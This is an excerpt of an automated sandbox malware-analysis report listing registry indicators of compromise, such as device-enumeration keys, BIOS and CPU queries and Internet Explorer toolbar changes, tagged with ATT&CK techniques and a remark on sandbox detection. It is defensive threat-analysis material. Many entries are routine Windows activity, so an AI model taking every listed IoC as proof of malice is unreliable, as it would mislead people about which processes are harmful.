Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	spectrum.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	spectrum.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	TieringEngineService.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	TieringEngineService.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jpg\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\MPEG2Demultiplexer	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wav	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.avi\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates	SearchFilterHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-123 = "Microsoft Word Document"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m1v	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@fxsresm.dll,-1131 = "Route through e-mail"	fxssvc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.gif	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1E589E9D-8A8D-46D9-A2F9-E6D4F8161EE9} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000084859d4e106cdb01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m1v\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E46787A1-4629-4423-A693-BE1F003B2742} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000e42f2a4f106cdb01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.gif\OpenWithList	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{AEB16279-B750-48F1-8586-97956060175A} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000b199914e106cdb01	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E2FB4720-F45F-4A3C-8CB2-2060E12425C3} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000084e13a4f106cdb01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-170 = "Microsoft PowerPoint 97-2003 Presentation"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mpg	SearchProtocolHost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{3DBEE9A1-C471-4B95-BBCA-F39310064458} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000003a885f4e106cdb01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-127 = "OpenDocument Text"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{97E467B4-98C6-4F19-9588-161B7773D6F6} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000065ce274f106cdb01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\zipfldr.dll,-10195 = "Compressed (zipped) Folder"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-115 = "Microsoft Excel 97-2003 Worksheet"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3g2\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tiff	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cr2\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmv	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp2	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-180 = "Microsoft PowerPoint 97-2003 Template"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.avi	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{8082C5E6-4C27-48EC-A809-B8E1122E8F97} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000b6846250106cdb01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wpl	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{33154C99-BF49-443D-A73C-303A23ABBE97} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000522c874f106cdb01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@windows.storage.dll,-21824 = "Camera Roll"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wmv\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device	SearchFilterHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E37A73F8-FB01-43DC-914E-AAEE76095AB9} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000009df60f4f106cdb01	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.WTV	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9908 = "Wave Sound"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-912 = "HTML Document"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\wshext.dll,-4803 = "VBScript Encoded Script File"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9937 = "3GPP Audio/Video"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tiff\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.bmp	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wav\OpenWithList	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-101 = "Microsoft Excel Worksheet"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-114 = "OpenDocument Spreadsheet"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp4	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\acppage.dll,-6003 = "Windows Command Script"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.3gpp	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\wshext.dll,-4802 = "VBScript Script File"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9914 = "Windows Media Audio/Video file"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Multimedia\ActiveMovie	SearchFilterHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithList	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	SearchFilterHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{C120DE80-FDE4-49F5-A713-E902EF062B8A} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000003b0a044f106cdb01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-107 = "Microsoft Excel Comma Separated Values File"	SearchProtocolHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{5383EF74-273B-4278-AB0C-CDAA9FD5369E} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000fc69444f106cdb01	SearchProtocolHost.exe

Modifies registry class 41 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\HotKey = "0"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings	taskmgr.exe
